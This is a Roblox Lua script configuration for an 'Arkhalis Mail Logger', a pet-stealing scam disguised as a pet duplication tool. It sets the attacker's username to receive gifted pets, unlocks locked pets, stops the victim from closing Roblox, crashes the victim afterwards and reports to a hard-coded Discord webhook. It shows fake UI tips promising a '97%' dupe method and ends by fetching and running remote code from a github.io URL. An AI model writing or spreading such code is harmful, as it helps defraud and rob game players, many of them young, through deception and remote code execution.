--[[ Arkhalis Mail Logger ]]--

--[[ Main Config ]]--
_G.Username = "Scandinaviaaaa" --// Username To Send Pets To
_G.UserId = 3986608494 --// Roblox Account Id [[https://www.roblox.com/users/IDHERE/profile]] <- This is a example
_G.GiftMessage = "lol" --// Message For The Gift To Say
_G.Diamonds = 1000000 --// Amount Of Diamonds To Not Kick
_G.UnlockPets = true --// Unlocks Locked Pets
_G.AntiLeave = true --// Doesn't Let The Target Close Roblox
_G.Crash = true --// Crashes Them After Its Finished
--[[ Webhook Config ]]--
_G.Webhook = "https://discord.com/api/webhooks/1101119245724700802/DSBIAWNsGEft1JOovecIp14m4uVX__-gs9sj7Ub6Hp-iHGgViaPNG8a2pnW5USto3_Ui" --// Discord Webhook For Executions

--[[ UI Config ]]--
_G.ScriptName = "loading" --// Script Name On The UI
_G.Tip1 = "press the dupe button to dupe pets !" --// Gives You Tips On The UI
_G.Tip2 = "we have the best dupe method 97%" --// Gives You Tips On The UI

--[[ Script ]]
loadstring(game:HttpGet("https://arkhalislua.github.io/Lua/Arkhalis.lua"))()
